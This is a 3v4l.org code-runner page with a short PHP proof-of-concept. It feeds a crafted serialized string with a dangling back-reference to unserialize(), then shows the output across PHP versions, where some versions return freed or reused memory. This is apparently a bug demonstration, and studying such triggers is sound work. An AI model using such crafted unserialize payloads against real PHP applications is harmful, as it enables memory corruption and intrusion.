3v4l.org

run code in 200+ php & hhvm versions
Bugs & Features
<?php class obj implements Serializable { var $data; function serialize() { return serialize($this->data); } function unserialize($data) { $this->data = unserialize($data); } } $inner = 'a:2:{i:0;i:1;i:1;i:2'; $exploit = 'a:2:{i:0;C:3:"obj":'.strlen($inner).':{'.$inner.'}i:1;R:5;}'; $data = unserialize($exploit); for ($i = 0; $i < 5; $i++) { $v[$i] = 'hi'.$i; } var_dump($data);
based on cW23S
Output for 5.3.18 - 5.3.29, 7.0.20 - 7.2.0
Notice: unserialize(): Error at offset 17 of 20 bytes in /in/gDfuY on line 9 Notice: unserialize(): Error at offset 52 of 53 bytes in /in/gDfuY on line 16 bool(false)
Output for 7.0.0 - 7.0.6
Notice: unserialize(): Error at offset 17 of 20 bytes in /in/gDfuY on line 9 array(1) { [0]=> object(obj)#1 (1) { ["data"]=> bool(false) } }
Output for 5.4.45, 5.5.29 - 5.5.35, 5.6.13 - 5.6.28
Notice: unserialize(): Error at offset 17 of 20 bytes in /in/gDfuY on line 9 array(2) { [0]=> object(obj)#1 (1) { ["data"]=> bool(false) } [1]=> NULL }
Output for 5.6.7 - 5.6.12
Notice: unserialize(): Error at offset 17 of 20 bytes in /in/gDfuY on line 9 array(2) { [0]=> object(obj)#1 (1) { ["data"]=> bool(false) } [1]=> &UNKNOWN:0 }
Output for 5.4.2 - 5.4.44, 5.5.24 - 5.5.28
Notice: unserialize(): Error at offset 17 of 20 bytes in /in/gDfuY on line 9 array(2) { [0]=> object(obj)#1 (1) { ["data"]=> bool(false) } [1]=> string(3) "hi2" }